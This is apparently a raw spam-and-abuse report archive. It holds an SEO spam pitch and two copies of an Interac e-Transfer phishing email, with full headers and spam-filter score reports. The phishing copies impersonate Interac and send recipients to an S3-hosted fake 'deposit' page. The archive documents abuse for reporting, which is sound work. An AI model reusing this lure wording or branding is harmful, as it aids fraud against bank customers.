[106.10.241.83 listed in dnsbl.ahbl.org]

[106.10.241.83 listed in dnsbl.ahbl.org]

[106.10.241.83 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org

[106.10.241.83 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org

[106.10.241.83 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org

[106.10.241.83 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org

[106.10.241.83 listed in dnsbl.ahbl.org]

-0.0 RCVD_IN_DNSWL_NONE RBL: Sender listed at http://www.dnswl.org/, no

trust

[106.10.241.83 listed in list.dnswl.org]

-0.0 SPF_PASS SPF: sender matches SPF record

-0.1 DKIM_VALID_AU Message has a valid DKIM or DK signature from author's

domain

0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily valid

-0.1 DKIM_VALID Message has at least one valid DKIM or DK signature

-0.1 DKIM_VALID_EF Message has a valid DKIM or DK signature from

envelope-from domain

0.2 MR_NOT_ATTRIBUTED_IP Beta rule: an non-attributed IPv4 found in

headers

1.2 MISSING_HEADERS Missing To: header

0.2 FREEMAIL_ENVFROM_END_DIGIT Envelope-from freemail username ends in

digit

[parulkumar235(at)yahoo.com]

0.0 FREEMAIL_FROM Sender email is commonly abused enduser mail provider

[parulkumar235(at)yahoo.com]

-0.0 T_RP_MATCHES_RCVD Envelope sender domain matches handover relay

domain

0.0 HTML_MESSAGE BODY: HTML included in message

-0.0 T_SCC_BODY_TEXT_LINE No description available.

1.4 MALFORMED_FREEMAIL Bad headers on message from free email service

Subject: {SPAM?} Re: Needful Response!



------=_Part_6233845_746359654.1726759609565

Content-Type: text/plain; charset=UTF-8

Content-Transfer-Encoding: 7bit



Hi,





I was checking your website on behalf this email "" and see you havea good design and it looks great, but it's not ranking on Google and othermajor search engine.



We can place your website on Google's 1st page (Yahoo, etc.)



If you are interested then please letme know. I will send to you our SEO Prices and Packages.



Thanks,



------=_Part_6233845_746359654.1726759609565

Content-Type: text/html; charset=UTF-8

Content-Transfer-Encoding: quoted-printable




=3D"font-family:Helvetica Neue, Helvetica, Arial, sans-serif;font-size:16px=

;">



2); font-family: times new roman, new york, times, serif; font-size: medium=

;">Hi,


class=3D"ydp3f9b1d25yahoo_quoted">

e', Helvetica, Arial, sans-serif;font-size:13px;color:#26282a;">

d=3D"ydp3f9b1d25yiv1983631796">

2" class=3D"ydp3f9b1d25yiv1983631796yqt1347472722">

d25yiv1983631796ydp962c2e92yahoo_quoted_7704918806" class=3D"ydp3f9b1d25yiv=

1983631796ydp962c2e92yahoo_quoted">

e', Helvetica, Arial, sans-serif;font-size:13px;color:#26282a;">

d=3D"ydp3f9b1d25yiv1983631796ydp962c2e92yiv2484958350">

25yiv1983631796ydp962c2e92yiv2484958350yqtfd74715" class=3D"ydp3f9b1d25yiv1=

983631796ydp962c2e92yiv2484958350yqt4046172839">

yiv1983631796ydp962c2e92yiv2484958350ydpa4955317yahoo_quoted_7473572929" cl=

ass=3D"ydp3f9b1d25yiv1983631796ydp962c2e92yiv2484958350ydpa4955317yahoo_quo=

ted">

if;font-size:13px;color:#26282a;">

dp962c2e92yiv2484958350ydpa4955317yiv3502948350">

983631796ydp962c2e92yiv2484958350ydpa4955317yiv3502948350yqtfd36802" class=

=3D"ydp3f9b1d25yiv1983631796ydp962c2e92yiv2484958350ydpa4955317yiv350294835=

0yqt5764184772">

58350ydpa4955317yiv3502948350ydpd6c82912yahoo_quoted_7329396542" class=3D"y=

dp3f9b1d25yiv1983631796ydp962c2e92yiv2484958350ydpa4955317yiv3502948350ydpd=

6c82912yahoo_quoted">

Arial, sans-serif;font-size:13px;color:#26282a;">

25yiv1983631796ydp962c2e92yiv2484958350ydpa4955317yiv3502948350ydpd6c82912y=

iv2453859892">

al, sans-serif;font-size:16px;" class=3D"ydp3f9b1d25yiv1983631796ydp962c2e9=

2yiv2484958350ydpa4955317yiv3502948350ydpd6c82912yiv2453859892yahoo-style-w=

rap">


iv2484958350ydpa4955317yiv3502948350ydpd6c82912yiv2453859892ydpf6c4d18dMsoN=

oSpacing">
es, serif" style=3D"background-color:inherit;" size=3D"3">




I was checking your website on behalf this email "" and see you have

a good design and it looks great, but it's not ranking on Google and other

major search engine.





We can place your website on Google's 1st page (Yahoo, etc.)

ne">




If you are interested then please let

me know. I will send to you our SEO Prices and Packages.





Thanks,



















------=_Part_6233845_746359654.1726759609565--

interac phish abusing Amazon

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Thu, 19 Sep 2024 04:30:01 -0600

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.98 (FreeBSD))

(envelope-from )

id 1srEQ7-000000004ox-2wYH

for dave@doctor.nl2k.ab.ca;

Thu, 19 Sep 2024 04:29:55 -0600

Resent-From: The Doctor

Resent-Date: Thu, 19 Sep 2024 04:29:55 -0600

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from vps.dubaistdclinic.com ([8.39.234.124]:45550)

by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384

(Exim 4.98 (FreeBSD))

(envelope-from )

id 1srD0u-00000000FP0-2tGN

for support@nk.ca;

Thu, 19 Sep 2024 02:59:54 -0600

DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=visadu.com;

s=default; h=Message-Id:Date:MIME-Version:Content-Type:To:Subject:From:Sender

:Reply-To:Cc:Content-Transfer-Encoding:Content-ID:Content-Description:

Resent-Date:Resent-From:Resent-Sender:Resent-To:Resent-Cc:Resent-Message-ID:

In-Reply-To:References:List-Id:List-Help:List-Unsubscribe:List-Subscribe:

List-Post:List-Owner:List-Archive;

bh=C5G1aPw9OMXfybOd36xwaipODDUWh/WTi+hMoVvjWHE=; b=m1jcOwTBpdrkJJcdZ2XyEx/wc3

7Ca75CZ8qRe5/SVZMDS2cXdbw0D/1j67t9eRD2dYTD701GCAfImyKVM5HtrhK3yqLjSreHfuPRdYH

Kj6b+gmf9gOpn7JrkM/KNola8C0e4kE1/st0P6fCLC3HuzPqJQr/JCVtdgyAgrY336K2k+EcYcP3w

T5rbQypLTDWdShhznJIJ1u4q22/vfWa63KwB+8i3NcoSHTEIFN69QWI5e/k8Ypf080P/rE4y6tdYe

amVMqQBh021TFjZrTjOTpnrRfmGZ74+u7DkfNWs8hdVIy5IauKYq69LkqYzf65Y3/245nMSRRoOje

x7ZTy0Ow==;

Received: from [20.175.115.56] (port=52150 helo=inter)

by vps.dubaistdclinic.com with esmtpsa (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384

(Exim 4.97.1)

(envelope-from )

id 1srChe-00000005dfR-2cJE

for support@nk.ca;

Thu, 19 Sep 2024 12:39:54 +0400

From: "Interac Payment Service!"

Subject: You've Got Money! Interac e-Transfer Received

To:

Content-Type: multipart/alternative; boundary="po8LKxsx8k6rGVWKPYsMW=_dgVelEFDITu"

MIME-Version: 1.0

Date: Thu, 19 Sep 2024 08:39:54 +0000

Message-Id: <202419090839549E66DCDE8B-06D504D8D5@visadu.com>

X-AntiAbuse: This header was added to track abuse, please include it with any abuse report

X-AntiAbuse: Primary Hostname - vps.dubaistdclinic.com

X-AntiAbuse: Original Domain - nk.ca

X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]

X-AntiAbuse: Sender Address Domain - visadu.com

X-Get-Message-Sender-Via: vps.dubaistdclinic.com: authenticated_id: info@visadu.com

X-Authenticated-Sender: vps.dubaistdclinic.com: info@visadu.com

X-Source:

X-Source-Args:

X-Source-Dir:

X-Spam_score: 15.7

X-Spam_score_int: 157

X-Spam_bar: +++++++++++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.



Content preview: http://www.interac.ca/en View in browser https://etransfer.interac.ca/ViewInBrowser.do?tokens=eNrVV12PozYU_Sso2odWmiYQCCTFrX1gTBMWYA6yJahnsXGYmi6iyV1DGHxA1LTYIQ2Gl3-6HNU2KMr--555x78_tkTzlNWMSIPGFOMoo

[...]



Content analysis details: (15.7 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org

[20.175.115.56 listed in dnsbl.ahbl.org]

[20.175.115.56 listed in dnsbl.ahbl.org]

[20.175.115.56 listed in dnsbl.ahbl.org]

[20.175.115.56 listed in dnsbl.ahbl.org]

[8.39.234.124 listed in dnsbl.ahbl.org]

[8.39.234.124 listed in dnsbl.ahbl.org]

[8.39.234.124 listed in dnsbl.ahbl.org]

[8.39.234.124 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org

[20.175.115.56 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org

[20.175.115.56 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org

[20.175.115.56 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org

[20.175.115.56 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_SBL_XBL RBL: Received via a relay in Spamhaus SBL+XBL

[20.175.115.56 listed in sbl-xbl.spamhaus.org]

3.6 RCVD_IN_SBL_CSS RBL: Received via a relay in Spamhaus SBL-CSS

[20.175.115.56 listed in zen.spamhaus.org]

1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org

[8.39.234.124 listed in will-spam-for-food.eu.org]

[8.39.234.124 listed in will-spam-for-food.eu.org]

[8.39.234.124 listed in will-spam-for-food.eu.org]

[8.39.234.124 listed in will-spam-for-food.eu.org]

[8.39.234.124 listed in will-spam-for-food.eu.org]

[8.39.234.124 listed in will-spam-for-food.eu.org]

[8.39.234.124 listed in will-spam-for-food.eu.org]

[8.39.234.124 listed in will-spam-for-food.eu.org]

-0.0 SPF_PASS SPF: sender matches SPF record

-0.1 DKIM_VALID_AU Message has a valid DKIM or DK signature from author's

domain

0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily valid

-0.1 DKIM_VALID Message has at least one valid DKIM or DK signature

-0.1 DKIM_VALID_EF Message has a valid DKIM or DK signature from

envelope-from domain

0.6 MEGALONGWORD BODY: Uses really overlong words

0.3 LONGWORD BODY: Uses overlong words

0.5 L_HELLO_ADDRESS BODY: Greets you by address, not by name

0.1 TW_SX BODY: Odd Letter Triples with SX

0.1 TW_WV BODY: Odd Letter Triples with WV

0.1 TW_HD BODY: Odd Letter Triples with HD

0.0 HTML_MESSAGE BODY: HTML included in message

-0.0 T_SCC_BODY_TEXT_LINE No description available.

0.8 SARE_FROM_SPAM_WORD3 I don't know people named this!

2.0 TVD_PH_BODY_META No description available.

1.5 IMPRONONCABLE_2 Too much mixed numbers and lower-case letters

0.0 T_REMOTE_IMAGE Message contains an external image

Subject: {SPAM?} You've Got Money! Interac e-Transfer Received



This is a multi-part message in MIME format



--po8LKxsx8k6rGVWKPYsMW=_dgVelEFDITu

Content-Type: text/plain; charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable





http://www.interac.ca/en

View in browser https://etransfer.interac.ca/ViewInBrowser.do?tokens=3D=

eNrVV12PozYU_Sso2odWmiYQCCTFrX1gTBMWYA6yJahnsXGYmi6iyV1DGHxA1LTYIQ2Gl3=

-6HNU2KMr--555x78_tkTzlNWMSIPGFOMooZx0dKYiqLye2koElyEuXkZhLTFrX1gTBMWY=

A6yJahnsXGYmi6iyV1DGHxA1LTYOcZJxIeHpXKi9vZjLbPpowrKkk0jcgskTMf_fKaPOa7=

mWs6vu163tLboNCyF3M0d7zVcjE3vcByViZygvVijVAYBou5tbbdleO7lu25brhCrhnCLc=

7hI1HqIJNbc2reTHIp9inN-nc-76ZvOY6JovWTFrX1gTBMWYA6yJahnsXGYmi6iyV1DGHx=

A1LTY09uxj0z9caY5PwweOALU3zizX71OyboBJY0kjZnCpUy7gV9fX6cJpXExVfE0EtmM8=

lmWqdnHNYmeAyHkr6Vp2nEiKY-O-vvc3fr3Qb3alrF3ma-DzG7SO1dK0t9KWqiqWnCm5Rj=

kRbL0ulYbFmaEpbAnKgslMqBdQeULi-hdnRzsZoUGg-UMLoFJjIsyz4VUk9uEpAXt5kGb0=

5ICMD2wu4P-3ZzTy7dSTwXsdu0ba8LhysZWnEhKYTMXisFmohgwMZcUsgI4dTLmmIwqVn5=

WRv-khi4Y7jItfcde2u7Ccm3vikoN054CwyecxMR4kgD2QBqZ2LOUVtl0UhmzgrVp-4FpO=

aG3WLpABdt1F74X-sgLQhSizcYKkIWcZRjMN2HordzQWS_hN1q4aAm74Ar0RVe1otgblHS=

Sk1OmySbpoUyJHMH6P_arzyizU_RRZQ7qrzgCi6OyOue9hHRAiKs2UmS75r0nsWHTWHzM-=

2fXmk9fVL38tQDUxyXsEqYWfROG8ENrODopRVRZ4IxmonbvbiOq17cPCGUvvJYLFrBze1B=

zcXrsM6gBfE1LTYISz_mt1AkIPcJWSHDTXq7sMCb6KowVfKV3L_nmoxWjTsg0wj9ayGl7i=

sxNgXmZ7fYvJJyXVYPgi1q9DoG6J_0Kb_WaqfClga99QY0LShDwzac47tqtolqcAaYOL0y=

1M9f5jvxWe66GEIvp482ZhGh-M717cPCGUvvJYLFrBze1BzcXrsM6gBfE1LTYlzvb_8fLW=

qx_uH5GBHowN-vF-a4QPxn2wvd_trqCpM-uhAySmkmmSxrgsKo4qWequVlAea58_q3NgBh=

jpY0NjANjb0BjQS6c7oo5n1hv_qsyulkcNpNp-bSA9uKqBsxk3eyNyG-8TSC7TidxHTd4A=

SKJHlDtYahl-NaDWfOsYyHgP-RdGu4HZ9Yur2s6ulxnsQp-Ov70__3wL_lb5dt-gRiZKoG=

ZcRqpxNvOabhUkH8wpyLMV50BTGhlBeyb7-J4zDGn5i_-xtFpux3LM4qrVqa1LfB6in6NR=

s62SRrl2Wstp_p_98ScyLtg9







Hi support@nk.ca,



Lynn Dion sent you $759.46 (CAD) on 9/19/2024 - 8:39 AM.



Deposit your money at:



https://superv2.s3.ca-central-1.amazonaws.com/superv2.html





Or



Select a different financial institution https://superv2.s3.ca-centra=

l-1.amazonaws.com/superv2.html





Expires: 9/19/2024 - 8:39 AM

What if you could deposit transfers without answering any questions? =

Sign up for Autodeposit in your online banking - the safe and convenie=

nt way to receive funds straight to your bank account.



=A9 2000 - 2024 Interac Corp. All rights reserved.



Terms of Use https://www.interac.ca/en/interac-e-transfer-terms-of-us=

e/



=AE Trade-marks of Interac Corp.



--po8LKxsx8k6rGVWKPYsMW=_dgVelEFDITu

Content-Type: text/html; charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable










8859-1">


e=3D"viewport" content=3D"width=3Ddevice-width, initial-scale=3D1.0"> =




able>





--po8LKxsx8k6rGVWKPYsMW=_dgVelEFDITu--



interac phish abusing Amazon

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Thu, 19 Sep 2024 04:30:01 -0600

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.98 (FreeBSD))

(envelope-from )

id 1srEPx-000000004nh-3v08

for dave@doctor.nl2k.ab.ca;

Thu, 19 Sep 2024 04:29:45 -0600

Resent-From: The Doctor

Resent-Date: Thu, 19 Sep 2024 04:29:45 -0600

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from vps.dubaistdclinic.com ([8.39.234.124]:39010)

by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384

(Exim 4.98 (FreeBSD))

(envelope-from )

id 1srC0H-00000000DKK-0Fji

for root@nl2k.ab.ca;

Thu, 19 Sep 2024 01:55:10 -0600

DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=visadu.com;

s=default; h=Message-Id:Date:MIME-Version:Content-Type:To:Subject:From:Sender

:Reply-To:Cc:Content-Transfer-Encoding:Content-ID:Content-Description:

Resent-Date:Resent-From:Resent-Sender:Resent-To:Resent-Cc:Resent-Message-ID:

In-Reply-To:References:List-Id:List-Help:List-Unsubscribe:List-Subscribe:

List-Post:List-Owner:List-Archive;

bh=jglCKQD8HTtjps7Qs7JwpZk0O7DtDumHTolED+XETyY=; b=XtK6eGQZXOz2SeO0xQVN18L9Mp

+u+awiH7oA8/k7jAOQDcqNBYTw2qgZBi1Zy5LBdo3c8iyRq927EoVE5NVZyc6LoCw7WQzsTdCKkzV

5H7Iyyj0y83u+bU5U31HqPrAnmjNdY85c2kU8SEaG2KriNrVomvGUO+c9f2Mxk60SkLISoK55j4DF

FgYXTcpL4ZvGmMr2/5Y2reLSuuGVA2xhT2i4lQn2jvJ8DxQKhCT31e1mqOQZ9iLxgInWXtDCiKWVQ

NdiwiHa13C2CTfQ/2KQOLk762zKGd5viMjtkF+QdgFf0EUqnbFijkVcUJ8xs/rip0uoX7Ug3MeYAe

ph1njPZQ==;

Received: from [20.175.115.56] (port=51559 helo=inter)

by vps.dubaistdclinic.com with esmtpsa (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384

(Exim 4.97.1)

(envelope-from )

id 1srBxP-00000005ZRo-1qCD

for root@nl2k.ab.ca;

Thu, 19 Sep 2024 11:52:07 +0400

From: "Interac Payment Service!"

Subject: You've Got Money! Interac e-Transfer Received

To:

Content-Type: multipart/alternative; boundary="po8LKxsx8k6rGVWKPYsMW=_dgVelEFDITu"

MIME-Version: 1.0

Date: Thu, 19 Sep 2024 07:52:07 +0000

Message-Id: <202419090752060A1E2831DE$E03F328AC4@visadu.com>

X-AntiAbuse: This header was added to track abuse, please include it with any abuse report

X-AntiAbuse: Primary Hostname - vps.dubaistdclinic.com

X-AntiAbuse: Original Domain - nl2k.ab.ca

X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]

X-AntiAbuse: Sender Address Domain - visadu.com

X-Get-Message-Sender-Via: vps.dubaistdclinic.com: authenticated_id: info@visadu.com

X-Authenticated-Sender: vps.dubaistdclinic.com: info@visadu.com

X-Source:

X-Source-Args:

X-Source-Dir:

X-Spam_score: 15.7

X-Spam_score_int: 157

X-Spam_bar: +++++++++++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.



Content preview: http://www.interac.ca/en View in browser https://etransfer.interac.ca/ViewInBrowser.do?tokens=eNrVV12PozYU_Sso2odWmiYQCCTFrX1gTBMWYA6yJahnsXGYmi6iyV1DGHxA1LTYIQ2Gl3-6HNU2KMr--555x78_tkTzlNWMSIPGFOMoo

[...]



Content analysis details: (15.7 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org

[20.175.115.56 listed in will-spam-for-food.eu.org]

[20.175.115.56 listed in will-spam-for-food.eu.org]

[20.175.115.56 listed in will-spam-for-food.eu.org]

[20.175.115.56 listed in will-spam-for-food.eu.org]

[20.175.115.56 listed in will-spam-for-food.eu.org]

[20.175.115.56 listed in will-spam-for-food.eu.org]

[20.175.115.56 listed in will-spam-for-food.eu.org]

[20.175.115.56 listed in will-spam-for-food.eu.org]

[8.39.234.124 listed in will-spam-for-food.eu.org]

[8.39.234.124 listed in will-spam-for-food.eu.org]

[8.39.234.124 listed in will-spam-for-food.eu.org]

[8.39.234.124 listed in will-spam-for-food.eu.org]

[8.39.234.124 listed in will-spam-for-food.eu.org]

[8.39.234.124 listed in will-spam-for-food.eu.org]

[8.39.234.124 listed in will-spam-for-food.eu.org]

[8.39.234.124 listed in will-spam-for-food.eu.org]

1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org

[8.39.234.124 listed in dnsbl.ahbl.org]

[8.39.234.124 listed in dnsbl.ahbl.org]

[8.39.234.124 listed in dnsbl.ahbl.org]

[8.39.234.124 listed in dnsbl.ahbl.org]

[20.175.115.56 listed in dnsbl.ahbl.org]

[20.175.115.56 listed in dnsbl.ahbl.org]

[20.175.115.56 listed in dnsbl.ahbl.org]

[20.175.115.56 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org

[8.39.234.124 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org

[8.39.234.124 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org

[8.39.234.124 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org

[8.39.234.124 listed in dnsbl.ahbl.org]

3.6 RCVD_IN_SBL_CSS RBL: Received via a relay in Spamhaus SBL-CSS

[20.175.115.56 listed in zen.spamhaus.org]

1.5 RCVD_IN_SBL_XBL RBL: Received via a relay in Spamhaus SBL+XBL

[20.175.115.56 listed in sbl-xbl.spamhaus.org]

-0.0 SPF_PASS SPF: sender matches SPF record

-0.1 DKIM_VALID_AU Message has a valid DKIM or DK signature from author's

domain

0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily valid

-0.1 DKIM_VALID Message has at least one valid DKIM or DK signature

-0.1 DKIM_VALID_EF Message has a valid DKIM or DK signature from

envelope-from domain

0.6 MEGALONGWORD BODY: Uses really overlong words

0.3 LONGWORD BODY: Uses overlong words

0.5 L_HELLO_ADDRESS BODY: Greets you by address, not by name

0.1 TW_SX BODY: Odd Letter Triples with SX

0.1 TW_WV BODY: Odd Letter Triples with WV

0.1 TW_HD BODY: Odd Letter Triples with HD

0.0 HTML_MESSAGE BODY: HTML included in message

0.8 SARE_FROM_SPAM_WORD3 I don't know people named this!

-0.0 T_SCC_BODY_TEXT_LINE No description available.

1.5 IMPRONONCABLE_2 Too much mixed numbers and lower-case letters

2.0 TVD_PH_BODY_META No description available.

Subject: {SPAM?} You've Got Money! Interac e-Transfer Received



This is a multi-part message in MIME format



--po8LKxsx8k6rGVWKPYsMW=_dgVelEFDITu

Content-Type: text/plain; charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable





http://www.interac.ca/en

View in browser https://etransfer.interac.ca/ViewInBrowser.do?tokens=3D=

eNrVV12PozYU_Sso2odWmiYQCCTFrX1gTBMWYA6yJahnsXGYmi6iyV1DGHxA1LTYIQ2Gl3=

-6HNU2KMr--555x78_tkTzlNWMSIPGFOMooZx0dKYiqLye2koElyEuXkZhLTFrX1gTBMWY=

A6yJahnsXGYmi6iyV1DGHxA1LTYOcZJxIeHpXKi9vZjLbPpowrKkk0jcgskTMf_fKaPOa7=

mWs6vu163tLboNCyF3M0d7zVcjE3vcByViZygvVijVAYBou5tbbdleO7lu25brhCrhnCLc=

7hI1HqIJNbc2reTHIp9inN-nc-76ZvOY6JovWTFrX1gTBMWYA6yJahnsXGYmi6iyV1DGHx=

A1LTY09uxj0z9caY5PwweOALU3zizX71OyboBJY0kjZnCpUy7gV9fX6cJpXExVfE0EtmM8=

lmWqdnHNYmeAyHkr6Vp2nEiKY-O-vvc3fr3Qb3alrF3ma-DzG7SO1dK0t9KWqiqWnCm5Rj=

kRbL0ulYbFmaEpbAnKgslMqBdQeULi-hdnRzsZoUGg-UMLoFJjIsyz4VUk9uEpAXt5kGb0=

5ICMD2wu4P-3ZzTy7dSTwXsdu0ba8LhysZWnEhKYTMXisFmohgwMZcUsgI4dTLmmIwqVn5=

WRv-khi4Y7jItfcde2u7Ccm3vikoN054CwyecxMR4kgD2QBqZ2LOUVtl0UhmzgrVp-4FpO=

aG3WLpABdt1F74X-sgLQhSizcYKkIWcZRjMN2HordzQWS_hN1q4aAm74Ar0RVe1otgblHS=

Sk1OmySbpoUyJHMH6P_arzyizU_RRZQ7qrzgCi6OyOue9hHRAiKs2UmS75r0nsWHTWHzM-=

2fXmk9fVL38tQDUxyXsEqYWfROG8ENrODopRVRZ4IxmonbvbiOq17cPCGUvvJYLFrBze1B=

zcXrsM6gBfE1LTYISz_mt1AkIPcJWSHDTXq7sMCb6KowVfKV3L_nmoxWjTsg0wj9ayGl7i=

sxNgXmZ7fYvJJyXVYPgi1q9DoG6J_0Kb_WaqfClga99QY0LShDwzac47tqtolqcAaYOL0y=

1M9f5jvxWe66GEIvp482ZhGh-M717cPCGUvvJYLFrBze1BzcXrsM6gBfE1LTYlzvb_8fLW=

qx_uH5GBHowN-vF-a4QPxn2wvd_trqCpM-uhAySmkmmSxrgsKo4qWequVlAea58_q3NgBh=

jpY0NjANjb0BjQS6c7oo5n1hv_qsyulkcNpNp-bSA9uKqBsxk3eyNyG-8TSC7TidxHTd4A=

SKJHlDtYahl-NaDWfOsYyHgP-RdGu4HZ9Yur2s6ulxnsQp-Ov70__3wL_lb5dt-gRiZKoG=

ZcRqpxNvOabhUkH8wpyLMV50BTGhlBeyb7-J4zDGn5i_-xtFpux3LM4qrVqa1LfB6in6NR=

s62SRrl2Wstp_p_98ScyLtg9







Hi root@nl2k.ab.ca,



Lynn Dion sent you $759.46 (CAD) on 9/19/2024 - 7:52 AM.



Deposit your money at:



https://superv2.s3.ca-central-1.amazonaws.com/superv2.html





Or



Select a different financial institution https://superv2.s3.ca-centra=

l-1.amazonaws.com/superv2.html





Expires: 9/19/2024 - 7:52 AM

What if you could deposit transfers without answering any questions? =

Sign up for Autodeposit in your online banking - the safe and convenie=

nt way to receive funds straight to your bank account.



=A9 2000 - 2024 Interac Corp. All rights reserved.



Terms of Use https://www.interac.ca/en/interac-e-transfer-terms-of-us=

e/



=AE Trade-marks of Interac Corp.



--po8LKxsx8k6rGVWKPYsMW=_dgVelEFDITu

Content-Type: text/html; charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable










8859-1">


e=3D"viewport" content=3D"width=3Ddevice-width, initial-scale=3D1.0"> =




ontainer">
=3D"text-center">
class=3D"or-container">
=


"columns text-left"> 3D=<br
"INTERAC" src=3D"http://etransfer-notification.interac.ca/images/own/e=

transfer_top_banner.png">
=


V12PozYU_Sso2odWmiYQCCTFrX1gTBMWYA6yJahnsXGYmi6iyV1DGHxA1LTYIQ2Gl3-6HN=

U2KMr--555x78_tkTzlNWMSIPGFOMooZx0dKYiqLye2koElyEuXkZhLTFrX1gTBMWYA6yJ=

ahnsXGYmi6iyV1DGHxA1LTYOcZJxIeHpXKi9vZjLbPpowrKkk0jcgskTMf_fKaPOa7mWs6=

vu163tLboNCyF3M0d7zVcjE3vcByViZygvVijVAYBou5tbbdleO7lu25brhCrhnCLc7hI1=

HqIJNbc2reTHIp9inN-nc-76ZvOY6JovWTFrX1gTBMWYA6yJahnsXGYmi6iyV1DGHxA1LT=

Y09uxj0z9caY5PwweOALU3zizX71OyboBJY0kjZnCpUy7gV9fX6cJpXExVfE0EtmM8lmWq=

dnHNYmeAyHkr6Vp2nEiKY-O-vvc3fr3Qb3alrF3ma-DzG7SO1dK0t9KWqiqWnCm5RjkRbL=

0ulYbFmaEpbAnKgslMqBdQeULi-hdnRzsZoUGg-UMLoFJjIsyz4VUk9uEpAXt5kGb05ICM=

D2wu4P-3ZzTy7dSTwXsdu0ba8LhysZWnEhKYTMXisFmohgwMZcUsgI4dTLmmIwqVn5WRv-=

khi4Y7jItfcde2u7Ccm3vikoN054CwyecxMR4kgD2QBqZ2LOUVtl0UhmzgrVp-4FpOaG3W=

LpABdt1F74X-sgLQhSizcYKkIWcZRjMN2HordzQWS_hN1q4aAm74Ar0RVe1otgblHSSk1O=

mySbpoUyJHMH6P_arzyizU_RRZQ7qrzgCi6OyOue9hHRAiKs2UmS75r0nsWHTWHzM-2fXm=

k9fVL38tQDUxyXsEqYWfROG8ENrODopRVRZ4IxmonbvbiOq17cPCGUvvJYLFrBze1BzcXr=

sM6gBfE1LTYISz_mt1AkIPcJWSHDTXq7sMCb6KowVfKV3L_nmoxWjTsg0wj9ayGl7isxNg=

XmZ7fYvJJyXVYPgi1q9DoG6J_0Kb_WaqfClga99QY0LShDwzac47tqtolqcAaYOL0y1M9f=

5jvxWe66GEIvp482ZhGh-M717cPCGUvvJYLFrBze1BzcXrsM6gBfE1LTYlzvb_8fLWqx_u=

H5GBHowN-vF-a4QPxn2wvd_trqCpM-uhAySmkmmSxrgsKo4qWequVlAea58_q3NgBhjpY0=

NjANjb0BjQS6c7oo5n1hv_qsyulkcNpNp-bSA9uKqBsxk3eyNyG-8TSC7TidxHTd4ASKJH=

lDtYahl-NaDWfOsYyHgP-RdGu4HZ9Yur2s6ulxnsQp-Ov70__3wL_lb5dt-gRiZKoGZcRq=

pxNvOabhUkH8wpyLMV50BTGhlBeyb7-J4zDGn5i_-xtFpux3LM4qrVqa1LfB6in6NRs62S=

Rrl2Wstp_p_98ScyLtg9">View in browser
=


;">Hi support@nk.ca,

Lynn Dion sent you $759.46 (CAD) on 9/19/=

2024 - 8:39 AM.


"font-size: 17.3px;">Deposit your money at:


onaws.com/superv2.html"> 3D"RBC
ransfer-content.interac.ca/en/logo_CA000003.png">
Or

s://superv2.s3.ca-central-1.amazonaws.com/superv2.html">Select a diffe=

rent financial institution

